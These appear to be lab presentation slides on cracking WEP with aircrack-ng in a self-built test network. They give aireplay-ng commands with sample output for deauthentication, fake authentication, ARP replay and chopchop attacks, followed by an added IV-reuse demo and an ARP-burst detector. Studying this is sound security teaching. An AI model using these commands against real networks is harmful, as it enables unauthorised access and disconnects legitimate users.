WEP Crack Using aircrack-ng Arunabh Das
Content
Part 1 - Background: WEP Encryption, Authentication, Vulnerabilities
Part 2 - Attack Experiment: Cracking WEP Keys, Test Environment, Network Topology, Hardware & Software, The Attack, Observations
Part 3 - Conclusion: Problems Encountered, Detection & Prevention, Conclusion, References
WEP Encryption
Wired Equivalent Privacy; 64-bit and 128-bit keys (including a 24-bit IV); utilizes RC4 and CRC32
WEP Authentication – Open System Authentication
http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html
WEP Authentication – Shared Key Authentication
http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html
WEP Vulnerability
Static keys; short IV (24 bits); susceptible to statistical-analysis-based attacks
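To make the 24-bit IV problem concrete, here is an added Python example that is not part of the slides: a toy RC4/CRC32 WEP encryptor, the birthday-bound arithmetic for a 16,777,216-value IV space, and a check that two frames encrypted under the same IV leak the XOR of their plaintexts without any knowledge of the key. RC4 and the WEP frame layout follow the standard definitions; the key, IVs and payloads are constructed values.

```python
"""Toy model of WEP framing showing why a 24-bit IV is too short.
Added example, not from the slides. RC4 and the WEP frame layout follow
the standard definitions; the key, IVs and payloads are constructed."""
import math
import zlib

IV_BITS = 24
IV_SPACE = 1 << IV_BITS          # 16,777,216 possible IVs per key


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) then output generation (PRGA).
    WEP seeds it with IV || secret key, so the IV is the only part of
    the seed that changes from frame to frame."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV in the clear, then RC4(IV || key) applied to
    plaintext || CRC32 integrity check value (ICV)."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    body = plaintext + icv
    keystream = rc4_keystream(iv + secret, len(body))
    return iv + bytes(b ^ k for b, k in zip(body, keystream))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def collision_probability(frames: int, space: int = IV_SPACE) -> float:
    """Birthday bound: probability that at least one IV repeats after
    `frames` frames with uniformly random IVs."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


def frames_for_probability(p: float, space: int = IV_SPACE) -> int:
    """Approximate frame count at which an IV repeat has probability p."""
    return math.ceil(math.sqrt(-2.0 * space * math.log(1.0 - p)))


def iv_reuse_leaks_xor(secret: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """Two frames under the same IV use the same keystream, so
    C1 xor C2 == P1 xor P2 regardless of the secret key. Returns True
    when that identity holds for the given inputs (it always does)."""
    assert len(p1) == len(p2)
    c1 = wep_encrypt(secret, iv, p1)[3:3 + len(p1)]   # strip IV, drop ICV
    c2 = wep_encrypt(secret, iv, p2)[3:3 + len(p2)]
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"      # constructed 40-bit key (64-bit WEP)
    print(f"P(IV repeat) after 5,000 frames: {collision_probability(5000):.2f}")
    print(f"frames for a 50% chance of a repeat: {frames_for_probability(0.5)}")
    print("IV reuse leaks P1 xor P2:",
          iv_reuse_leaks_xor(key, b"\x00\x00\x01", b"hello world!", b"goodbye now!"))
```

The numbers are the point: a busy access point sends thousands of frames per minute, and with random IVs a repeat is more likely than not after roughly 4,800 frames; drivers that reset the IV to zero on association or increment it sequentially make repeats even more predictable. Every repeat hands an eavesdropper P1 xor P2 for free, which is the foundation the statistical key-recovery attacks build on.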
Network Topology (diagram): attacker, victim, Wireless AP
H/W and S/W requirements
Attacker – OS: Ubuntu 8.04; NIC: iwl4965/Atheros AR5007 b/g; Software: Kismet, Airodump, Aireplay, Airjack
Victim – OS: Windows XP; NIC: D-Link WUA-2340 USB adaptor; Software: D-Link Wireless Connection Manager
Wireless AP Linksys WRT54GL
Types of attacks using aireplay
It currently implements multiple different attacks:
Attack 0: Deauthentication
Attack 1: Fake Authentication
Attack 2: Interactive Packet Replay
Attack 3: ARP Request Replay Attack
Attack 4: KoreK Chopchop attack
Attack 5: Fragmentation attack
Attack 6: Caffe-latte attack
Attack 7: Client-oriented fragmentation attack
Source - http://www.aircrack-ng.org/doku.php?id=aireplay-ng
Deauthentication
This attack is a type of "man-in-the-middle" attack which sends disassociation packets to one or more clients currently associated with a particular access point, making the client disconnect from the AP and connect to the cracker's fake AP. The reasons for disassociating clients are: generating ARP requests, forcing clients to re-authenticate, and recovering a hidden ESSID.
Deauthentication cont.
Use aireplay to achieve the de-auth attack. Command: aireplay-ng -0 1 -a <AP MAC address> -c <client MAC address> ath0
-0 means deauthentication
1 is the number of deauths to send
-a is the MAC address of the access point
-c is the MAC address of the client to de-auth
ath0 is the interface name
Deauthentication cont.
The MAC addresses of the AP and the client can be obtained by sniffing with tools like Wireshark. The output of the command from the slide above will look like: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
STMAC is the MAC address of the client (the client is then de-authenticated, and the attacker will then be connected with the spoofed victim's address)
Fake authentication
Fake authentication allows the attacker to perform the two types of WEP authentication (open system and shared key) plus associate with the AP. Unlike the deauthentication attack, no ARP packets are generated; fake authentication is only useful when the attacker needs an associated MAC address for other packet injection attacks but no client is currently connected to the AP.
Fake authentication cont.
The actual aireplay command: aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -y sharedkeyxor ath0
-1 means fake authentication
0 is the reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:09:5B:EC:EE:F2 is our card's MAC address
-y sharedkeyxor is the name of the file containing the PRGA xor bits. This is only used for shared key authentication; open system authentication, which is typical, does not require this. (PRGA xor bits can be obtained from the de-auth or KoreK chopchop attack.)
ath0 is the wireless interface name
ARP Request Replay attack
The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs). The program listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over; however, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to determine the WEP key.
ARP Request Replay attack cont.
Basic usage aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Where:
-3 means standard ARP request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
ARP Request Replay attack cont.
An output of the above command would be:
Saving ARP requests in replay_arp-0219123051.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets
KoreK chopchop
This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. Some APs are not vulnerable to this attack.
KoreK chopchop cont.
Perform KoreK chopchop with aireplay: aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
-4 means the chopchop attack
-h 00:09:5B:EC:EE:F2 is the MAC address of an associated client, or your card's MAC if you did fake authentication
-b 00:14:6C:7E:40:80 is the access point MAC address
ath0 is the wireless interface name
KoreK chopchop cont.
Sample output of the above command:
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
Fragmentation Attack
This attack, when successful, can obtain 1500 bytes of PRGA (pseudo-random generation algorithm) output. This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng, which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack.
KoreK chopchop vs. Fragmentation Attack
The fragmentation attack obtains the full packet length of 1500 bytes of xor (keystream), so a packet of any size can be generated, which is sufficient to create an ARP request. It is extremely fast; however, it needs more information, such as the IP address, to launch.
The chopchop attack does not need to know any IP info, but it is much slower and the maximum number of xor bits it can recover is limited.
Flow Chart for Cracking
Source – http://www.aircrack-ng.org/doku.php?id=flowchart#section_7frag_chop-chop_failed
Configuring Environment – Step 1: Configure Access Point
Set the encryption to WEP and generate keys using a passphrase
Configuring Environment – Step 2: Configure Access Point
Set the SSID and the broadcast channel.
Configuring Environment – Step 3: Configure Access Point
Set the Authentication type to Auto
Installation – Installation of Kismet – Steps 1–7 (screenshots)
Installation – Patching of kernel – Step 1
Note that the 2.6.24 version of the kernel doesn't contain the modules that we need
Installation – Patching of kernel – Step 2
Install kernel-package libraries
Installation – Patching of kernel – Step 3
Wait for complete installation of kernel-package libraries
Installation – Patching of kernel – Step 4
Download the latest version of the kernel using wget
Installation – Patching of kernel – Steps 5–10 (screenshots)
Installation – Patching of kernel – Step 11
Finding a client that is connected to the AP and client's MAC id
Installation – Patching of kernel – Steps 12–55 (screenshots)
Preparatory – Testing Injection – Step 1
Enable card to monitor mode
Preparatory – Testing Injection – Step 2
Basic test to determine if card supports injection
Preparatory – Testing Injection – Step 3
Check hidden ID or check specific SSID
Preparatory – Testing Injection – Step 4
Create 2 virtual wireless interfaces for attack test
Preparatory – Testing Injection – Step 5 (screenshot)
Reconnaissance – Steps 1–9 (screenshots)
Attack Without Deauth – Steps 1–13 (screenshots)
Iteration 2 – ARP Request Replay without deauthentication request – Attack Step 1
Taking down the network interface in order to change the MAC
Iteration 2 – ARP Request Replay without deauthentication request – Attack Step 2
Finding a target AP and the channel it is broadcasting on.
Iteration 2 – ARP Request Replay without deauthentication request – Attack Step 3
Finding a client that is connected to the AP and client's MAC id
Iteration 2 – ARP Request Replay with deauthentication request – Attack Step 4
Changing the attacker's MAC id to match the client's (spoofing)
Iteration 2 – ARP Request Replay with deauthentication request – Attack Step 5
Initiating airodump to capture packets, especially weak IV packets
Iteration 2 – ARP Request Replay with deauthentication request – Attack Step 6
Monitoring airodump to monitor rate of capture
Iteration 2 – ARP Request Replay with deauthentication request – Attack Step 7
Initiate aireplay to inject frames
Iteration 2 – ARP Request Replay with deauthentication request – Attack Step 8
Monitoring number of ARP requests generated
Iteration 2 – ARP Request Replay with deauthentication request – Attack Step 9
Sending de-authentication frames to client
ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)
Step 1 (screenshot)
Step 2 (screenshot)
Step 3: Finding a client that is connected to the AP and client's MAC id
Step 4 (screenshot)
Step 5: Initiating airodump to capture packets, especially weak IV packets
Step 6: Monitoring airodump to monitor rate of capture
Step 7: Initiate aireplay to inject frames
Step 8: Monitoring number of ARP requests generated
Step 9: Sending de-authentication frames to client
Steps 10–14 (screenshots)
Steps 15–22: Using aircrack to crack
Observations/Conclusion
WEP is weak and can be cracked easily
We were able to crack WEP in x minutes
WEP encrypted networks should be replaced with WPA/WPA2
Detection/Prevention
When an abnormal number of ARP requests is being made, it may be a sign that a hacker is trying to crack your WEP key. Careful monitoring and logging of such an event can help administrators detect such an attack. Preventing such an attack is near impossible.
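A minimal version of the monitoring the slide calls for, as an added Python example that is not from the slides: a sliding-window detector that alerts on a burst of ARP requests from one station (the signature of replay injection) or a burst of deauthentication frames against one BSSID. The log line format, the thresholds and the sample lines are constructed assumptions; the MAC addresses are the ones shown on the earlier slides.

```python
"""Rate-based detector for the two signals named in the slides: a burst
of ARP requests from one station and a burst of deauthentication frames.
Added example, not from the slides. The log format, thresholds and the
sample lines are constructed; adapt parse_line() to your own sensor."""
import re
from collections import defaultdict, deque

# Assumed line format: "<seconds> src=<mac> bssid=<mac> type=<FRAME_TYPE>"
LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+src=(?P<src>[0-9A-Fa-f:]{17})\s+"
    r"bssid=(?P<bssid>[0-9A-Fa-f:]{17})\s+type=(?P<type>[A-Z_]+)$")

# Assumed thresholds: a normal client sends a handful of ARP requests per
# minute, while replay injection produces hundreds per second.
ARP_THRESHOLD = 20      # ARP requests from one source station ...
DEAUTH_THRESHOLD = 5    # ... or deauth frames for one BSSID ...
WINDOW_SECONDS = 10.0   # ... inside this window raise an alert


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m["ts"]), "src": m["src"].lower(),
            "bssid": m["bssid"].lower(), "type": m["type"]}


class BurstDetector:
    """Sliding-window event counter keyed by (signal, station)."""

    def __init__(self, window=WINDOW_SECONDS):
        self.window = window
        self.events = defaultdict(deque)   # key -> timestamps in window
        self.alerted = set()               # one alert per key per burst

    def observe(self, rec):
        if rec["type"] == "ARP_REQUEST":
            key, limit = ("arp", rec["src"]), ARP_THRESHOLD
        elif rec["type"] == "DEAUTH":
            key, limit = ("deauth", rec["bssid"]), DEAUTH_THRESHOLD
        else:
            return None
        q = self.events[key]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > self.window:   # expire old events
            q.popleft()
        if len(q) >= limit and key not in self.alerted:
            self.alerted.add(key)
            return (f"{key[0]} burst: {len(q)} frames, key={key[1]}, "
                    f"window={self.window:g}s, t={rec['ts']:g}")
        if len(q) < limit:
            self.alerted.discard(key)      # burst ended; re-arm the alert
        return None


def scan(lines):
    """Run the detector over an iterable of log lines; return alerts."""
    det = BurstDetector()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        alert = det.observe(rec)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample: a quiet client, then one station replaying ARP
# requests at 10 per second, then a deauth flood against the AP.
AP = "00:14:6c:7e:40:80"
CLIENT = "00:40:f4:77:e5:c9"
INJECTOR = "00:09:5b:ec:ee:f2"
SAMPLE_LOG = (
    [f"{t:.1f} src={CLIENT} bssid={AP} type=ARP_REQUEST" for t in (1.0, 31.0, 61.0)]
    + [f"{100 + i / 10:.1f} src={INJECTOR} bssid={AP} type=ARP_REQUEST" for i in range(300)]
    + [f"{200 + i:.1f} src={INJECTOR} bssid={AP} type=DEAUTH" for i in range(8)]
)

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print("ALERT", a)
```

Two design points worth copying into a real sensor: key the ARP counter by source station so one chatty host cannot be masked by aggregate traffic, and suppress repeat alerts until the window drains so a thirty-second injection run produces one ticket rather than three hundred. The same counters also surface the deauthentication step of the attack, which is the one the slides say precedes the ARP replay when no client is already generating traffic.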
References
[1] "Aireplay-ng", URL: http://www.aircrack-ng.org/doku.php?id=aireplay-ng
[2] "Computer Security", URL: http://en.wikipedia.org/wiki/Computer_security
[3] "Exploit (computer security)", URL: http://en.wikipedia.org/wiki/Exploit_(computer_security)
Questions?